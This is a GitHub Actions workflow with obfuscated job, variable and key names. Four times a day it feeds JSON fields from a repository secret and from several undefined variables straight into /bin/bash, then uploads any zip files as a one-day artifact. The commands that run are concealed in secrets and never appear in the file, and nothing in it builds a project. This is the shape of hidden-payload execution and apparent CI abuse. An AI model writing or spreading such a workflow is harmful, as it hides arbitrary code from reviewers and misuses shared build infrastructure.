name: expressquantum1
on:
  workflow_dispatch:

  schedule:
    - cron: '0 2,8,14,20 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: expressquantum1
        env:
          i32: ${{ secrets.i32 }}
        run: |
          printf '%s' "$i32" | jq -r .tobq2 | /bin/bash
          printf '%s' "$zcfqi8426" | jq -r .syu5 | /bin/bash
          echo $gw3 | jq -r .lrgmg38214 | /bin/bash
          echo $gv5 | jq -r .ixb307 | /bin/bash
          echo $fm8 | jq -r .ny27 | /bin/bash
          printf '%s' "$y7712" | jq -r .ggsp27464 | /bin/bash
          echo $sxvue498 | jq -r .aqpuf7 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: osELlpbt
          path: "*.zip"
          retention-days: 1
